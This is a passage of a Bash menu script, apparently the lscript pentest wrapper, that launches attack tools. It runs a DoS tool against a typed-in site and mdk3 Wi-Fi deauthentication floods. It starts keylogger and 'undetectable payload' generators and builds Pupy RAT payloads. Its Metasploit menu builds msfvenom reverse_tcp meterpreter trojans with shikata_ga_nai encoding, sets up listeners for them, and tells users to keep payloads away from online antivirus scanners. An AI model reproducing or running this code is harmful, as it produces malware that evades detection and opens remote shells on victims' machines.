2749 | if [ -d "/root/xerxes" ]
2750 | then
2751 | echo -e "Do you own the site you want to DoS?"$YNONLY""
2752 | read DOSTERM
2753 | if [ "$DOSTERM" = "y" ]
2754 | then
2755 |
2756 | clear
2757 | echo -e "Enter your site(e.g: iownthissite.com): "
2758 | echo -e "(without www)"
2759 | read -e SITEDOS
2760 | clear
2761 | echo -e "Launching www.isitdownrightnow.com for $SITEDOS"
2762 | sleep 4
2763 | xdg-open http://www.isitdownrightnow.com/"$SITEDOS".html
2764 | clear
2765 | cd /root/xerxes
2766 | SITEDOSX=www.$SITEDOS
2767 | echo -e "Press "$YS"any key"$CE" to start DoS on $SITEDOSX"
2768 | $READAK
2769 | ./xerxes $SITEDOSX 80
2770 | else
2771 | clear
2772 | echo -e "Then never try this."
2773 | sleep 3
2774 | exec bash "$0"
2775 | fi
2776 | else
2777 | echo -e "$TNI"
2778 | echo -e "$PAKTGB"
2779 | $READAK
2780 | fi
2781 | elif [ "$APPP" = "16" ]
2782 | then
2783 | if [ -d /root/mdk3-master ]
2784 | then
2785 | echo -e "Press "$YS"CTRL C"$CE" when you find your target AP"
2786 | echo -e "Press "$YS"any key"$CE" to start scanning."
2787 | $READAK
2788 | airodump-ng $WLANNM
2789 | echo -e "Enter your target's BSSID: "
2790 | read -e MDBSSID
2791 | echo -e "Enter your target's channel: "
2792 | read -e MDCHANN
2793 | echo -e "Enter frames per second(e.g: 50): "
2794 | read -e FPS
2795 | clear
2796 | xterm -e 'mdk3 $WLANNM t $MDCHANN $MDBSSID $FPS'
2797 | else
2798 | echo -e "$TNI"
2799 | echo -e "$PAKTGB"
2800 | $READAK
2801 | fi
2802 | elif [ "$APPP" = "17" ]
2803 | then
2804 | if [ -d /root/mdk3-master ]
2805 | then
2806 | echo -e "Press "$YS"any key"$CE" to start scanning with wash."
2807 | $READAK
2808 | gnome-terminal -e 'wash -i $WLANNM'
2809 | echo -e "Enter your target's BSSID: "
2810 | read -e MDBSSID
2811 | echo -e "Enter your target's ESSID: "
2812 | read -e MDESSID
2813 | #~ echo -e "Enter your target's channel: "
2814 | #~ read -e MDCHANN
2815 | echo -e "Enter frames per second(e.g: 50): "
2816 | read -e FPS
2817 | clear
2818 | xterm -e 'mdk3 $WLANNM x 0 -t $MDBSSID -n $MDESSID -s $FPS'
2819 | else
2820 | echo -e "$TNI"
2821 | echo -e "$PAKTGB"
2822 | $READAK
2823 | fi
2824 | elif [ "$APPP" = "18" ]
2825 | then
2826 | if [ -d "/usr/share/KatanaFramework" ]
2827 | then
2828 | ktf.console
2829 | else
2830 | echo -e "$TNI"
2831 | echo -e "$PAKTGB"
2832 | $READAK
2833 | fi
2834 | elif [ "$APPP" = "19" ]
2835 | then
2836 | if [ -d "/root/airgeddon" ]
2837 | then
2838 | cd /root/airgeddon
2839 | ./airgeddon.sh
2840 | cd
2841 | else
2842 | echo -e "$TNI"
2843 | echo -e "$PAKTGB"
2844 | $READAK
2845 | fi
2846 | elif [ "$APPP" = "20" ]
2847 | then
2848 | if [ -d "/usr/share/websploit" ]
2849 | then
2850 | websploit
2851 | else
2852 | echo -e "$TNI"
2853 | echo -e "$PAKTGB"
2854 | $READAK
2855 | fi
2856 | elif [ "$APPP" = "21" ]
2857 | then
2858 | if [ -d /etc/openvas ]
2859 | then
2860 | echo -e "Start or stop?("$YS"start"$CE"/"$YS"stop"$CE")"
2861 | read -e SORS
2862 | if [ "$SORS" == "start" ]
2863 | then
2864 | netstat -nltp
2865 | openvas-start
2866 | echo -e "Launching firefox..."
2867 | sleep 1
2868 | firefox https://127.0.0.1:9392
2869 | else
2870 | openvas-stop
2871 | fi
2872 | else
2873 | echo -e "$TNI"
2874 | echo -e "$PAKTGB"
2875 | $READAK
2876 | fi
2877 | elif [ "$APPP" = "22" ]
2878 | then
2879 | if [ -d "/usr/lib/ipscan" ]
2880 | then
2881 | bash /usr/bin/ipscan & disown
2882 | else
2883 | echo -e "$TNI"
2884 | echo -e "$PAKTGB"
2885 | $READAK
2886 | fi
2887 | elif [ "$APPP" = "23" ]
2888 | then
2889 | if [ -d "/root/routersploit" ]
2890 | then
2891 | cd /root/routersploit
2892 | ./rsf.py
2893 | cd
2894 | else
2895 | echo -e "$TNI"
2896 | echo -e "$PAKTGB"
2897 | $READAK
2898 | fi
2899 | elif [ "$APPP" = "24" ]
2900 | then
2901 | if [ -d "/root/nWatch" ]
2902 | then
2903 | cd /root/nWatch
2904 | python nwatch.py
2905 | cd
2906 | else
2907 | echo -e "$TNI"
2908 | echo -e "$PAKTGB"
2909 | $READAK
2910 | fi
2911 | elif [ "$APPP" = "25" ]
2912 | then
2913 | if [ -d "/root/eternal_scanner" ]
2914 | then
2915 | cd /root/eternal_scanner
2916 | ./escan
2917 | cd
2918 | else
2919 | echo -e "$TNI"
2920 | echo -e "$PAKTGB"
2921 | $READAK
2922 | fi
2923 | elif [ "$APPP" = "26" ]
2924 | then
2925 | if [ -d "/root/eaphammer" ]
2926 | then
2927 | eaphammer_automation
2928 | else
2929 | echo -e "$TNI"
2930 | echo -e "$PAKTGB"
2931 | $READAK
2932 | fi
2933 | cd
2934 | elif [ "$APPP" = "6" ]
2935 | then
2936 | if [ -d "/root/hakkuframework" ]
2937 | then
2938 | while true
2939 | do
2940 | printf '\033]2;OSRFCONSOLE\a'
2941 | clear
2942 | echo -e ""$YS" 1"$CE") usufy"
2943 | echo -e ""$YS" 2"$CE") mailfy"
2944 | echo -e ""$YS" 3"$CE") searchfy"
2945 | echo -e ""$YS" 4"$CE") domainfy"
2946 | echo -e ""$YS" 5"$CE") phonefy"
2947 | echo -e ""$YS" 6"$CE") entify"
2948 | echo -e ""$YS"back"$CE") Go back"
2949 | echo -e ""$YS"00"$CE") Main menu"
2950 | # echo -e ""$YS" 0"$CE") EXIT"
2951 | echo -e "Choose: "
2952 | read -e OSFR
2953 | clear
2954 | if [ "$OSFR" = "1" ]
2955 | then
2956 | echo -e "Use: usufy.py -n name1 name2 -p twitter facebook"
2957 | usufy.py
2958 | exit
2959 | elif [ "$OSFR" = "2" ]
2960 | then
2961 | echo -e "Use: mailfy.py -n name1"
2962 | mailfy.py
2963 | exit
2964 | elif [ "$OSFR" = "3" ]
2965 | then
2966 | searchfy.py
2967 | exit
2968 | elif [ "$OSFR" = "4" ]
2969 | then
2970 | domainfy.py
2971 | exit
2972 | elif [ "$OSFR" = "5" ]
2973 | then
2974 | phonefy.py
2975 | exit
2976 | elif [ "$OSFR" = "6" ]
2977 | then
2978 | entify.py
2979 | exit
2980 | elif [ "$OSFR" = "0" ]
2981 | then
2982 | exit
2983 | elif [ "$OSFR" = "00" ]
2984 | then
2985 | exec bash "$0"
2986 | elif [ "$OSFR" = "back" ]
2987 | then
2988 | break
2989 | else
2990 | echo -e "Wrong choice"
2991 | sleep 0.3
2992 | clear
2993 | exec bash "$0"
2994 | fi
2995 | done
2996 | else
2997 | echo -e "$TNI"
2998 | echo -e "$PAKTGB"
2999 | $READAK
3000 | fi
3001 | elif [ "$APPP" = "0" ]
3002 | then
3003 | clear
3004 | exit
3005 | elif [ "$APPP" = "00" ]
3006 | then
3007 | clear
3008 | exec bash "$0"
3009 | elif [ "$APPP" = "back" ]
3010 | then
3011 | break
3012 | fi
3013 | if [ "$APPP" != "" ]
3014 | then
3015 | echo -e "$PAKTGB"
3016 | $READAK
3017 | fi
3018 | done
3019 | }
3020 | function remote_access
3021 | {
3022 | while true
3023 | do
3024 | clear
3025 | echo -e "-------------------------"$RS"Remote access"$CE"---------------------------"
3026 | printf '\033]2;REMOTE ACCESS\a'
3027 | if [ -d /root/BeeLogger ]
3028 | then
3029 | echo -e ""$YS" 1"$CE") BeeLogger Generate keylogger"
3030 | else
3031 | echo -e ""$RS" 1"$CE") "$RS"BeeLogger"$CE" Generate keylogger"
3032 | fi
3033 | if [ -d /root/ezsploit ]
3034 | then
3035 | echo -e ""$YS" 2"$CE") Ezsploit Generate payloads for many platforms,listeners etc..."
3036 | else
3037 | echo -e ""$RS" 2"$CE") "$RS"Ezsploit"$CE" Generate payloads for many platforms,listeners etc..."
3038 | fi
3039 | if [ -d /root/pupy ]
3040 | then
3041 | echo -e ""$YS" 3"$CE") Pupy Generate payloads for many platforms,listeners etc..."
3042 | else
3043 | echo -e ""$RS" 3"$CE") "$RS"Pupy"$CE" Generate payloads for many platforms,listeners etc..."
3044 | fi
3045 | if [ -d /root/zirikatu ]
3046 | then
3047 | echo -e ""$YS" 4"$CE") Zirikatu Generate undetectable payloads"
3048 | else
3049 | echo -e ""$RS" 4"$CE") "$RS"Zirikatu"$CE" Generate undetectable payloads"
3050 | fi
3051 | if [ -d /root/TheFatRat ]
3052 | then
3053 | echo -e ""$YS" 5"$CE") TheFatRat Generate undetectable payloads"
3054 | else
3055 | echo -e ""$RS" 5"$CE") "$RS"TheFatRat"$CE" Generate undetectable payloads"
3056 | fi
3057 | if [ -d /root/Winpayloads ]
3058 | then
3059 | echo -e ""$YS" 6"$CE") Winpayloads Generate undetectable payloads"
3060 | else
3061 | echo -e ""$RS" 6"$CE") "$RS"Winpayloads"$CE" Generate undetectable payloads"
3062 | fi
3063 | if [ -f /usr/bin/shellter ]
3064 | then
3065 | echo -e ""$YS" 7"$CE") Shellter Inject payload into .exe"
3066 | else
3067 | echo -e ""$RS" 7"$CE") "$RS"Shellter"$CE" Inject payload into .exe"
3068 | fi
3069 | if [ -d /root/CHAOS ]
3070 | then
3071 | echo -e ""$YS" 8"$CE") CHAOS Generate payloads/listeners"
3072 | else
3073 | echo -e ""$RS" 8"$CE") "$RS"CHAOS"$CE" Generate payloads/listeners"
3074 | fi
3075 | echo -e ""$YS"back"$CE") Go back"
3076 | echo -e ""$YS"00"$CE") Main menu"
3077 | #echo -e ""$YS" 0"$CE") EXIT"
3078 | echo -e "Choose: "
3079 | read -e KEYLOG
3080 | clear
3081 | if [ "$KEYLOG" = "1" ]
3082 | then
3083 | if [ -d /root/BeeLogger ]
3084 | then
3085 | cd /root/BeeLogger
3086 | python bee.py
3087 | cd
3088 | else
3089 | echo -e "$TNI"
3090 | echo -e "$PAKTGB"
3091 | $READAK
3092 | fi
3093 | elif [ "$KEYLOG" = "8" ]
3094 | then
3095 | if [ -d /root/CHAOS ]
3096 | then
3097 | cd /root/CHAOS
3098 | go run CHAOS.go
3099 | else
3100 | echo -e "$TNI"
3101 | echo -e "$PAKTGB"
3102 | $READAK
3103 | fi
3104 | elif [ "$KEYLOG" = "7" ]
3105 | then
3106 | if [ -f /usr/bin/shellter ]
3107 | then
3108 | shellter
3109 | else
3110 | echo -e "$TNI"
3111 | echo -e "$PAKTGB"
3112 | $READAK
3113 | fi
3114 | elif [ "$KEYLOG" = "2" ]
3115 | then
3116 | if [ -d /root/ezsploit ]
3117 | then
3118 | cd /root/ezsploit/
3119 | ./ezsploit.sh
3120 | cd
3121 | #~ echo -e "TUTORIAL AFTER GENERATION OF PAYLOAD"
3122 | #~ echo -e "Open a new terminal and type:"
3123 | #~ echo -e "msfconsole"
3124 | #~ echo -e "use exploit/multi/handler"
3125 | #~ echo -e "THIS DEPENDS ON THE PLAYLOAD TYPE. E.G: FOR ANDROID IS: set payload android/meterpreter/reverse_tcp"
3126 | #~ echo -e "set lhost "
3127 | #~ echo -e "set lport 4444"
3128 | #~ echo -e "exploit"
3129 | echo -e "Go to metasploit menu to create a listener(Option "$YS"14"$CE")"
3130 | sleep 2
3131 | echo -e "Press "$YS"any key"$CE" to leave..."
3132 | $READAK
3133 | exec bash "$0"
3134 | else
3135 | echo -e "$TNI"
3136 | echo -e "$PAKTGB"
3137 | $READAK
3138 | fi
3139 | elif [ "$KEYLOG" = "3" ]
3140 | then
3141 | if [ -d /root/pupy ]
3142 | then
3143 | while true
3144 | do
3145 | clear
3146 | echo -e ""$YS" 1"$CE") Generate a payload"
3147 | echo -e ""$YS" 2"$CE") Start listener"
3148 | echo -e ""$YS"back"$CE") Go back"
3149 | echo -e ""$YS"00"$CE") Main menu"
3150 | echo -e ""$YS" 0"$CE") EXIT"
3151 | read -e PUPY
3152 | if [ "$PUPY" = "1" ]
3153 | then
3154 | clear
3155 | echo -e "Choose the target OS:"
3156 | echo -e ""$YS" 1"$CE") Windows"
3157 | echo -e ""$YS" 2"$CE") Linux"
3158 | echo -e ""$YS" 3"$CE") Android"
3159 | echo -e "Choose: "
3160 | read -e TAROS
3161 | if [ "$TAROS" = "1" ]
3162 | then
3163 | TAROS="windows"
3164 | elif [ "$TAROS" = "2" ]
3165 | then
3166 | TAROS="linux"
3167 | elif [ "$TAROS" = "3" ]
3168 | then
3169 | TAROS="android"
3170 | else
3171 | echo -e "Wrong choice.Returning to main manu..."
3172 | sleep 2
3173 | exec bash "$0"
3174 | fi
3175 | clear
3176 | echo -e "Enter your ip: "
3177 | read -e PUPYIP
3178 | clear
3179 | echo -e "Enter your port(e.g: 443): "
3180 | read -e PUPYPORT
3181 | clear
3182 | echo -e "Enter the full output path(e.g: /root/Desktop/payload1.exe)"
3183 | read -e PUPYPATH
3184 | cd /root/pupy/pupy
3185 | ./pupygen.py -O $TAROS -o "$PUPYPATH" connect --host "$PUPYIP":"$PUPYPORT"
3186 | cd
3187 | elif [ "$PUPY" = "2" ]
3188 | then
3189 | cd /root/pupy/pupy
3190 | ./pupysh.py
3191 | elif [ "$PUPY" = "00" ]
3192 | then
3193 | exec bash "$0"
3194 | elif [ "$PUPY" = "back" ]
3195 | then
3196 | break
3197 | elif [ "$PUPY" = "0" ]
3198 | then
3199 | exit
3200 | fi
3201 | done
3202 | else
3203 | echo -e "$TNI"
3204 | echo -e "$PAKTGB"
3205 | $READAK
3206 | fi
3207 | elif [ "$KEYLOG" = "4" ]
3208 | then
3209 | if [ -d /root/zirikatu ]
3210 | then
3211 | clear
3212 | echo -e "CAUTION: DO NOT upload it to anti-virus scanners online."
3213 | sleep 3
3214 | echo -e "You agree with that?("$YS"YES"$CE"/"$YS"*"$CE")"
3215 | read MUSTBEYES
3216 | if [ "$MUSTBEYES" = "YES" ]
3217 | then
3218 | clear
3219 | cd /root/zirikatu
3220 | ./zirikatu.sh
3221 | cd
3222 | fi
3223 | else
3224 | echo -e "$TNI"
3225 | echo -e "$PAKTGB"
3226 | $READAK
3227 | fi
3228 | elif [ "$KEYLOG" = "5" ]
3229 | then
3230 | if [ -d /root/TheFatRat ]
3231 | then
3232 | fatrat
3233 | else
3234 | echo -e "$TNI"
3235 | echo -e "$PAKTGB"
3236 | $READAK
3237 | fi
3238 | elif [ "$KEYLOG" = "6" ]
3239 | then
3240 | if [ -d /root/Winpayloads ]
3241 | then
3242 | cd /root/Winpayloads
3243 | ./WinPayloads.py
3244 | cd
3245 | else
3246 | echo -e "$TNI"
3247 | echo -e "$PAKTGB"
3248 | $READAK
3249 | fi
3250 | elif [ "$KEYLOG" = "00" ]
3251 | then
3252 | clear
3253 | exec bash "$0"
3254 | elif [ "$KEYLOG" = "0" ]
3255 | then
3256 | clear
3257 | exit
3258 | elif [ "$KEYLOG" = "back" ]
3259 | then
3260 | break
3261 | fi
3262 | done
3263 | }
3264 | function information_gathering
3265 | {
3266 | while true
3267 | do
3268 | clear
3269 | echo -e "---------------------"$RS"Information Gathering"$CE"-----------------------"
3270 | printf '\033]2;INFORMATION GATHERING\a'
3271 | if [ -d /usr/share/sniper ]
3272 | then
3273 | echo -e ""$YS" 1"$CE") Sniper"
3274 | else
3275 | echo -e ""$RS" 1"$CE") "$RS"Sniper"$CE""
3276 | fi
3277 | if [ -d /root/ReconDog ]
3278 | then
3279 | echo -e ""$YS" 2"$CE") ReconDog"
3280 | else
3281 | echo -e ""$RS" 2"$CE") "$RS"ReconDog"$CE""
3282 | fi
3283 | if [ -d /root/RED_HAWK ]
3284 | then
3285 | echo -e ""$YS" 3"$CE") RED HAWK"
3286 | else
3287 | echo -e ""$RS" 3"$CE") "$RS"RED HAWK"$CE""
3288 | fi
3289 | if [ -d /root/Infoga ]
3290 | then
3291 | echo -e ""$YS" 4"$CE") Infoga"
3292 | else
3293 | echo -e ""$RS" 4"$CE") "$RS"Infoga"$CE""
3294 | fi
3295 | if [ -d /root/KnockMail ]
3296 | then
3297 | echo -e ""$YS" 5"$CE") KnockMail"
3298 | else
3299 | echo -e ""$RS" 5"$CE") "$RS"KnockMail"$CE""
3300 | fi
3301 | echo -e ""$YS"back"$CE") Go back"
3302 | echo -e ""$YS"00"$CE") Main menu"
3303 | echo -e "Choose: "
3304 | read INFOG
3305 | clear
3306 | if [ $INFOG = 1 ]
3307 | then
3308 | if [ -d /usr/share/sniper ]
3309 | then
3310 | echo -e "Enter the domain you want to scan: "
3311 | read DOMAIN
3312 | clear
3313 | sniper $DOMAIN
3314 | else
3315 | echo -e "$TNI"
3316 | echo -e "$PAKTGB"
3317 | $READAK
3318 | fi
3319 | elif [ $INFOG = 2 ]
3320 | then
3321 | if [ -d /root/ReconDog ]
3322 | then
3323 | cd /root/ReconDog
3324 | python dog.py
3325 | cd
3326 | else
3327 | echo -e "$TNI"
3328 | echo -e "$PAKTGB"
3329 | $READAK
3330 | fi
3331 | elif [ $INFOG = 3 ]
3332 | then
3333 | if [ -d /root/RED_HAWK ]
3334 | then
3335 | cd /root/RED_HAWK
3336 | php rhawk.php
3337 | cd
3338 | else
3339 | echo -e "$TNI"
3340 | echo -e "$PAKTGB"
3341 | $READAK
3342 | fi
3343 | elif [ $INFOG = 4 ]
3344 | then
3345 | if [ -d /root/Infoga ]
3346 | then
3347 | echo -e "Domain to search:"
3348 | read INFOTARG
3349 | echo -e "Data source(e.g. "$YS"all"$CE","$YS"google"$CE","$YS"bing"$CE","$YS"yahoo"$CE","$YS"pgp"$CE"): "
3350 | read INFOSOUR
3351 | clear
3352 | cd /root/Infoga
3353 | python infoga.py -t $INFOTARG -s $INFOSOUR
3354 | echo -e "$PAKTGB"
3355 | $READAK
3356 | cd
3357 | else
3358 | echo -e "$TNI"
3359 | echo -e "$PAKTGB"
3360 | $READAK
3361 | fi
3362 | elif [ $INFOG = 5 ]
3363 | then
3364 | if [ -d /root/KnockMail ]
3365 | then
3366 | clear
3367 | cd /root/KnockMail
3368 | python2.7 knock.py
3369 | cd
3370 | else
3371 | echo -e "$TNI"
3372 | echo -e "$PAKTGB"
3373 | $READAK
3374 | fi
3375 | elif [ $INFOG = 0 ]
3376 | then
3377 | exit
3378 | elif [ $INFOG = 00 ]
3379 | then
3380 | exec bash $0
3381 | elif [ $INFOG = "back" ]
3382 | then
3383 | break
3384 | fi
3385 | done
3386 | }
3387 | function other_tools
3388 | {
3389 | while true
3390 | do
3391 | printf '\033]2;OTHER TOOLS\a'
3392 | clear
3393 | if [ -f /usr/bin/geany ]
3394 | then
3395 | echo -e ""$YS" 1"$CE") Geany Best notepad for linux"
3396 | else
3397 | echo -e ""$RS" 1"$CE") "$RS"Geany"$CE" Best notepad for linux"
3398 | fi
3399 | if [ -d /root/dagon ]
3400 | then
3401 | echo -e ""$YS" 2"$CE") Dagon Hash cracker/Advanced Hash Manipulation"
3402 | else
3403 | echo -e ""$RS" 2"$CE") "$RS"Dagon"$CE" Hash cracker/Advanced Hash Manipulation"
3404 | fi
3405 | if [ -d /root/LALIN ]
3406 | then
3407 | echo -e ""$YS" 3"$CE") LALIN Automatically install any package for pentest "
3408 | else
3409 | echo -e ""$RS" 3"$CE") "$RS"LALIN"$CE" Automatically install any package for pentest "
3410 | fi
3411 | if [ -d /root/cupp ]
3412 | then
3413 | echo -e ""$YS" 4"$CE") Cupp Make specific worldlists"
3414 | else
3415 | echo -e ""$RS" 4"$CE") "$RS"Cupp"$CE" Make specific worldlists"
3416 | fi
3417 | echo -e ""$YS"back"$CE") Go back"
3418 | echo -e ""$YS" 0"$CE") EXIT"
3419 | echo -e "Choose: "
3420 | read -e OTHERT
3421 | clear
3422 | if [ $OTHERT = 1 ]
3423 | then
3424 | if [ -f /usr/bin/geany ]
3425 | then
3426 | geany
3427 | else
3428 | echo -e "$TNI"
3429 | echo -e "$PAKTGB"
3430 | $READAK
3431 | fi
3432 | elif [ $OTHERT = 2 ]
3433 | then
3434 | if [ -d /root/dagon ]
3435 | then
3436 | dagon_script
3437 | else
3438 | echo -e "$TNI"
3439 | echo -e "$PAKTGB"
3440 | $READAK
3441 | fi
3442 | elif [ $OTHERT = 3 ]
3443 | then
3444 | if [ -d /root/LALIN ]
3445 | then
3446 | cd /root/LALIN
3447 | ./Lalin.sh
3448 | cd
3449 | else
3450 | echo -e "$TNI"
3451 | echo -e "$PAKTGB"
3452 | $READAK
3453 | fi
3454 | elif [ "$APPP" = "4" ]
3455 | then
3456 | if [ -d "/root/cupp" ]
3457 | then
3458 | cd /root/cupp
3459 | python cupp.py -i
3460 | cd
3461 | else
3462 | echo -e "$TNI"
3463 | echo -e "$PAKTGB"
3464 | $READAK
3465 | fi
3466 | elif [ $OTHERT = 00 ]
3467 | then
3468 | clear
3469 | exec bash $0
3470 | elif [ $OTHERT = "back" ]
3471 | then
3472 | break
3473 | elif [ $OTHERT = 0 ]
3474 | then
3475 | clear
3476 | exit
3477 | fi
3478 | done
3479 | }
3480 | function metasploit_menu
3481 | {
3482 | if [ ! -d "$LPATH"/rc ]
3483 | then
3484 | mkdir "$LPATH"/rc
3485 | fi
3486 | while true
3487 | do
3488 | clear
3489 | echo -e "---------------------------"$RS"METASPLOIT"$CE"----------------------------"
3490 | printf '\033]2;METASPLOIT\a'
3491 | echo -e ""$YS" 1"$CE") Create payload with msfvenom"
3492 | echo -e ""$YS" 2"$CE") Create listener"
3493 | echo -e ""$YS" 3"$CE") Saved listeners"
3494 | echo -e ""$YS" 4"$CE") Start msfconsole"
3495 | echo -e ""$YS" 5"$CE") Update msfconsole"
3496 | echo -e ""$YS" 6"$CE") Armitage"
3497 | echo -e ""$YS"back"$CE") Go back"
3498 | echo -e ""$YS" 0"$CE") EXIT"
3499 | echo -e "Choose: "
3500 | read -e METASP
3501 | clear
3502 | if [ "$METASP" = "1" ]
3503 | then
3504 | PAYLOADL=""
3505 | echo -e "PAYLOAD (Default: "$YS"windows/meterpreter/reverse_tcp"$CE"): "
3506 | read PAYLOADL
3507 | if [ -z "$PAYLOADL" ]
3508 | then
3509 | echo -e "Setting PAYLOAD to windows/meterpreter/reverse_tcp"
3510 | sleep 2
3511 | PAYLOADL="windows/meterpreter/reverse_tcp"
3512 | fi
3513 | echo -e "LHOST: "
3514 | read ATIP
3515 | echo -e ""
3516 | echo -e "LPORT: "
3517 | read ATPORT
3518 | echo -e ""
3519 | echo -e "Enter the target's architecture("$YS"x86"$CE"/"$YS"x64"$CE"): "
3520 | read TARCH
3521 | echo -e "Enter the name of the payload(e.g: "$YS"trojan2"$CE"): "
3522 | read ATEXE
3523 | ATEXEPATH="/root/Desktop/$ATEXE.exe"
3524 | clear
3525 | echo -e "Generating"
3526 | sleep 0.1
3527 | echo .
3528 | sleep 0.1
3529 | echo .
3530 | sleep 0.1
3531 | echo .
3532 | sleep 0.1
3533 | echo .
3534 | sleep 0.1
3535 | echo .
3536 | sleep 0.1
3537 | echo .
3538 | if [ "$TARCH" = "x64" ]
3539 | then
3540 | msfvenom -p $PAYLOADL --platform windows -a x64 -f exe -e x86/shikata_ga_nai LHOST="$ATIP" LPORT="$ATPORT" -o "$ATEXEPATH"
3541 | else
3542 | msfvenom -p $PAYLOADL --platform windows -a x86 -f exe -e x86/shikata_ga_nai LHOST="$ATIP" LPORT="$ATPORT" -o "$ATEXEPATH"
3543 | fi
3544 | echo -e "Done."
3545 | echo -e ""
3546 | echo -e "$PAKTC"
3547 | $READAK
3548 | clear
3549 | echo -e "Create a listener for this payload? $YNYES "
3550 | read PAYL
3551 | if [ "$PAYL" != "n" ]
3552 | then
3553 | echo -e "Name of listener(e.g: "$YS"john"$CE") : "
3554 | read NAMEL
3555 | echo "use exploit/multi/handler" > "$LPATH"/rc/"$NAMEL".rc
3556 | echo "set PAYLOAD $PAYLOADL " >> "$LPATH"/rc/"$NAMEL".rc
3557 | echo "set LHOST $ATIP " >> "$LPATH"/rc/"$NAMEL".rc
3558 | echo "set LPORT $ATPORT " >> "$LPATH"/rc/"$NAMEL".rc
3559 | echo "set ExitOnSession false" >> "$LPATH"/rc/"$NAMEL".rc
3560 | echo "exploit -j" >> "$LPATH"/rc/"$NAMEL".rc
3561 | clear
3562 | echo -e "Launch the listener now? "$YNONLY""
3563 | read LLN
3564 | if [ "$LLN" = "y" ]
3565 | then
3566 | echo -e "Launching msfconsole..."
3567 | sleep 2
3568 | clear
3569 | msfconsole -r "$LPATH"/rc/"$NAMEL".rc
3570 | fi
3571 | fi
3572 | elif [ "$METASP" = "z" ]
3573 | then
3574 | clear
3575 | echo -e "CAUTION: DO NOT upload it to anti-virus scanners online."
3576 | sleep 3
3577 | echo -e "You agree with that?("$YS"YES"$CE"/"$YS"*"$CE")"
3578 | read MUSTBEYES
3579 | if [ "$MUSTBEYES" = "YES" ]
3580 | then
3581 | clear
3582 | cd /root/zirikatu
3583 | ./zirikatu.sh
3584 | fi
3585 | elif [ "$METASP" = "2" ]
3586 | then
3587 | clear
3588 | echo -e "LHOST: "
3589 | read LHOSTL
3590 | echo -e "LPORT: "
3591 | read LPORTL
3592 | echo -e "PAYLOAD (Default: "$YS"windows/meterpreter/reverse_tcp"$CE"): "
3593 | read PAYLOADL
3594 | if [ -z "$PAYLOADL" ]
3595 | then
3596 | echo -e "Setting PAYLOAD to windows/meterpreter/reverse_tcp"
3597 | sleep 2
3598 | PAYLOADL="windows/meterpreter/reverse_tcp"
3599 | fi
3600 | echo -e "Name of listener(e.g: "$YS"john"$CE") : "
3601 | read NAMEL
3602 | echo "use exploit/multi/handler" > "$LPATH"/rc/"$NAMEL".rc
3603 | echo "set PAYLOAD $PAYLOADL " >> "$LPATH"/rc/"$NAMEL".rc
3604 | echo "set LHOST $LHOSTL " >> "$LPATH"/rc/"$NAMEL".rc
3605 | echo "set LPORT $LPORTL " >> "$LPATH"/rc/"$NAMEL".rc
3606 | echo "set ExitOnSession false" >> "$LPATH"/rc/"$NAMEL".rc
3607 | echo "exploit -j" >> "$LPATH"/rc/"$NAMEL".rc
3608 | clear
3609 | echo -e "Launch the listener now? "$YNONLY""
3610 | read LLN
3611 | if [ "$LLN" = "y" ]
3612 | then
3613 | echo -e "Launching msfconsole..."
3614 | sleep 2
3615 | clear
3616 | msfconsole -r "$LPATH"/rc/"$NAMEL".rc
3617 | fi
3618 | elif [ "$METASP" = "3" ]
3619 | then
3620 | while true
3621 | do
3622 | clear
3623 | ls -w 1 "$LPATH"/rc
3624 | echo -e ""
3625 | echo -e ""
3626 | echo -e "Enter the name of the listener you want to select(e.g: "$YS"john"$CE")"
3627 | echo -e ""$YS"reset"$CE") Delete all saved listeners"
3628 | echo -e ""$YS" back"$CE") Go back"
3629 | read NAMERC
3630 | clear
3631 | if [ "$NAMERC" = "back" ]
3632 | then
3633 | break
3634 | elif [ "$NAMERC" = "reset" ]
3635 | then
3636 | rm -f "$LPATH"/rc/*
3637 | continue
3638 | fi
3639 | if [ ! -f "$LPATH"/rc/"$NAMERC" ]
3640 | then
3641 | NAMERC="$NAMERC".rc
3642 | if [ ! -f "$LPATH"/rc/"$NAMERC" ]
3643 | then
3644 | echo -e "File not found. Try again.."
3645 | sleep 2
3646 | continue
3647 | fi
3648 | fi
3649 | while true
3650 | do
3651 | clear
3652 | echo -e ""$NAMERC" selected."
3653 | echo -e ""$YS" 1"$CE") Start listener"
3654 | echo -e ""$YS" 2"$CE") Delete listener"
3655 | echo -e ""$YS"back"$CE") Go back"
3656 | echo -e "Choose: "
3657 | read LISTL
3658 | if [ "$LISTL" = "1" ]
3659 | then
3660 | msfconsole -r "$LPATH"/rc/"$NAMERC"
3661 | elif [ "$LISTL" = "2" ]
3662 | then
3663 | rm "$LPATH"/rc/"$NAMERC"
3664 | break
3665 | elif [ "$LISTL" = "back" ]
3666 | then
3667 | break
3668 | fi
3669 | done
3670 | done
3671 | elif [ "$METASP" = "4" ]
3672 | then
3673 | msfconsole
3674 | elif [ "$METASP" = "5" ]
3675 | then
3676 | msfupdate
3677 | elif [ "$METASP" = "6" ]
3678 | then
3679 | service postgresql start
3680 | armitage
3681 | clear
3682 | elif [ "$METASP" = "back" ]
3683 | then
3684 | BACKL="1"
3685 | break
3686 | elif [ "$METASP" = "00" ]
3687 | then
3688 | exec bash "$0"
3689 | elif [ "$METASP" = "0" ]
3690 | then
3691 | clear
3692 | exit
3693 | fi
3694 | done
3695 | }
3696 | function update_lscript
3697 | {
3698 | echo -e "Checking for updates..."
3699 | TESTINTERNETCONNECTION=$(curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//')
3700 | if [ "$TESTINTERNETCONNECTION" != "" ]
3701 | then
3702 | VER=$(timeout -s SIGTERM 20 curl "https://raw.githubusercontent.com/arismelachroinos/lscript/master/version.txt" 2>/dev/null)
3703 | if [ "$VERSION" != "$VER" ]
3704 | then
3705 | clear
3706 | echo -e "There is an update available."
3707 | echo -e "Current version: $VERSION"
3708 | echo -e "Updated version: $VER"
3709 | echo -e "$PAKTC"
3710 | $READAK
3711 | clear
3712 | echo -e "Do you want to update?"$YNONLY": "
3713 | read UPDATEYN
3714 | if [ "$UPDATEYN" = "y" ]
3715 | then
3716 | clear
3717 | echo -e "Making new directory for the old lscript (will pass it to /root/lscriptold)"
3718 | sleep 2
3719 | mkdir /root/lscriptold
3720 | echo -e ""
3721 | echo -e "Moving lscript to lscriptold"
3722 | sleep 2
3723 | mv "$LPATH" /root/lscriptold
3724 | echo -e "Cloning the latest github version to new "$LPATH""
3725 | sleep 2
3726 | cd
3727 | git clone https://github.com/arismelachroinos/lscript.git
3728 | cd "$LPATH"
3729 | chmod +x install.sh
3730 | clear
